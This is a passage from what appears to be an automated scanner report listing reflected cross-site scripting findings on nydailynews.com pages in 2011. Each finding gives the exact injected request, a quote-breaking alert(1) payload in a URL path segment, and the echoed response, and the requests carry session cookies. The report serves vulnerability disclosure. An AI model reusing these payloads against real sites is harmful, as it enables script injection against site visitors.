Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:39:22 GMT
Server: Apache
Keep-Alive: timeout=3, max=996
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69752

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/img/staticc6e7b';alert(1)//3e61a40bc15/covers/frontpage_cover.jpg';
}
//-->
...[SNIP]...

4.193. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/img/static/covers/frontpage_cover.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f104'%3balert(1)//a91ae3923d0 was submitted in the REST URL parameter 3. This input was echoed as 3f104';alert(1)//a91ae3923d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/static/covers3f104'%3balert(1)//a91ae3923d0/frontpage_cover.jpg?1313102107 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:39:34 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69752

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/img/static/covers3f104';alert(1)//a91ae3923d0/frontpage_cover.jpg';
}
//-->
...[SNIP]...

4.194. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/img/static/covers/frontpage_cover.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcd32'%3balert(1)//2ebec79faf0 was submitted in the REST URL parameter 4. This input was echoed as bcd32';alert(1)//2ebec79faf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /img/static/covers/frontpage_cover.jpgbcd32'%3balert(1)//2ebec79faf0?1313102107 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:39:47 GMT
Server: Apache
Keep-Alive: timeout=3, max=997
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69752

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
'seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/img/static/covers/frontpage_cover.jpgbcd32';alert(1)//2ebec79faf0';
}
//-->
...[SNIP]...

4.195. http://www.nydailynews.com/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb973'%3balert(1)//5ae776482d2 was submitted in the REST URL parameter 1. This input was echoed as cb973';alert(1)//5ae776482d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index.htmlcb973'%3balert(1)//5ae776482d2 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:48:20 GMT
Server: Apache
Keep-Alive: timeout=3, max=996
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69725

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/index.htmlcb973';alert(1)//5ae776482d2';
}
//-->
...[SNIP]...

4.196. http://www.nydailynews.com/news/index.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/news/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5e28'%3balert(1)//72640ad8ae9 was submitted in the REST URL parameter 1. This input was echoed as c5e28';alert(1)//72640ad8ae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /newsc5e28'%3balert(1)//72640ad8ae9/index.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.2.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:44:12 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69730

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
{
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/newsc5e28';alert(1)//72640ad8ae9/index.html';
}
//-->
...[SNIP]...

4.197. http://www.nydailynews.com/news/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/news/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 433e7'%3balert(1)//a6ca7c8d8b3 was submitted in the REST URL parameter 2. This input was echoed as 433e7';alert(1)//a6ca7c8d8b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/index.html433e7'%3balert(1)//a6ca7c8d8b3 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.2.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:44:24 GMT
Server: Apache
Keep-Alive: timeout=3, max=999
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69730

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/news/index.html433e7';alert(1)//a6ca7c8d8b3';
}
//-->
...[SNIP]...

4.198. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e41'%3balert(1)//2868a32650b was submitted in the REST URL parameter 1. This input was echoed as a7e41';alert(1)//2868a32650b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /newsa7e41'%3balert(1)//2868a32650b/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:44:51 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69836

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
{
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/newsa7e41';alert(1)//2868a32650b/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html';
}
//-->
...[SNIP]...

4.199. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c808'%3balert(1)//cc626548f60 was submitted in the REST URL parameter 2. This input was echoed as 2c808';alert(1)//cc626548f60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/national2c808'%3balert(1)//cc626548f60/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:02 GMT
Server: Apache
Keep-Alive: timeout=3, max=996
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69836

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/news/national2c808';alert(1)//cc626548f60/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html';
}
//-->
...[SNIP]...

4.200. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e722e'%3balert(1)//9a384f26ad1 was submitted in the REST URL parameter 3. This input was echoed as e722e';alert(1)//9a384f26ad1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/national/2011e722e'%3balert(1)//9a384f26ad1/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:18 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69836

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/news/national/2011e722e';alert(1)//9a384f26ad1/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html';
}
//-->
...[SNIP]...

4.201. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1bb'%3balert(1)//d95411b89d1 was submitted in the REST URL parameter 4. This input was echoed as cf1bb';alert(1)//d95411b89d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/national/2011/08cf1bb'%3balert(1)//d95411b89d1/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:27 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69836

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/news/national/2011/08cf1bb';alert(1)//d95411b89d1/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html';
}
//-->
...[SNIP]...

4.202. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab767'%3balert(1)//079ca41f4fb was submitted in the REST URL parameter 5. This input was echoed as ab767';alert(1)//079ca41f4fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/national/2011/08/11ab767'%3balert(1)//079ca41f4fb/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
